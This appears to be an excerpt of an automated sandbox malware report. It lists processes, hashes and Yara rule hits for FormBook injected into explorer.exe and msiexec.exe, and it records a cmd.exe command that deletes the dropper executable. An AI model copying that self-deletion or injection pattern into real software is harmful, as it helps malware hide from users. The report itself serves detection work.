Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.1450157027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.1450157027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.1450157027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.1450157027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.1450157027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low
Has exited:	true

Target ID:	7
Start time:	14:54:39
Start date:	28/02/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff70ffd0000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 00000007.00000002.3796185468.000000000869F000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Target ID:	8
Start time:	14:54:42
Start date:	28/02/2024
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\msiexec.exe
Imagebase:	0xbd0000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.3785670627.0000000004B20000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3785670627.0000000004B20000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.3785670627.0000000004B20000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.3785670627.0000000004B20000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.3785670627.0000000004B20000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.3785324441.0000000004AF0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3785324441.0000000004AF0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.3785324441.0000000004AF0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.3785324441.0000000004AF0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.3785324441.0000000004AF0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.3781993487.0000000000B90000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3781993487.0000000000B90000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.3781993487.0000000000B90000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.3781993487.0000000000B90000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.3781993487.0000000000B90000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high
Has exited:	false

Target ID:	9
Start time:	14:54:45
Start date:	28/02/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del "C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe"
Imagebase:	0x410000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	10
Start time:	14:54:45
Start date:	28/02/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true